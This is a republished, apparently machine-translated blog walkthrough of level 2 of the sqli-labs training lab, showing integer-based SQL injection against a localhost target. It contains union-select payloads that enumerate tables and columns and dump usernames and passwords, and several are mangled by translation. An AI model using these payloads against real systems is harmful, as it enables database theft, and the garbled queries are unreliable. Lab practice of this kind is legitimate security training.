The second level of sqli-labs-master: Error Based- Intiger 02/24 Update SLTechnology News&Howtos

The second level of sqli-labs-master: Error Based- Intiger

2025-02-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

Follow up the previous blog: https://blog.51cto.com/tdcqvip/2060816

Come to the second level:

Http://127.0.0.1/sqli-labs-master/Less-2/

Visit http://127.0.0.1/sqli-labs-master/Less-2/?id=1

Determine whether there is an injection point:

And 1 = 1 returns to normal

Http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 1% 23

And 1 = 2 returned failure

Http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1 = 2% 23

Indicates that there is an injection point:

Order by n View Field

Return correct when nicked 3

Http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3% 23

An error is returned when = 4

Http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 4% 23

The description field is 3

Do a federated query with union select:

And display bits in the way of error report:

Http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1, 2, 3, 23

From the image above, you can see that the display bit is on 2BI 3.

Use version () and database () to view the php version and the name of the database used by the current website

We can see from the figure above that the database is "security" version 5.5.53.

Next, let's look at the table under database security:

Http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1 training group concat (table_name), 3 from information_schema.tables where table_schema = 'security'% 23

From the figure above, you can see that there is a users table.

View the columns in the users table

Http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1, group_concat (column_name), 3 from information_schema.columns where table_name = 'users'% 23

The next step is to check the contents of username and password:

Http://127.0.0.1/sqli-labs-master/Less-2/?id=-1 union select 1 _ name _ password from users where id = 2% 23

End:

Disclaimer: the source code has been changed by me, so the query statement is displayed when it is injected

Next take a look at the source code:

Less-2 * * Error Based- Intiger**Welcome Dhakkan

We can see from the source code that there is no filtering when connecting to the database query.

What is different from the first level is that

$sql= "SELECT * FROM users WHERE id=$id LIMIT 0Jol 1"

There is no "''" symbol in this sentence.

It is used in roughly the same way.

The third level should be updated as soon as possible.

Official account of Wechat:

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.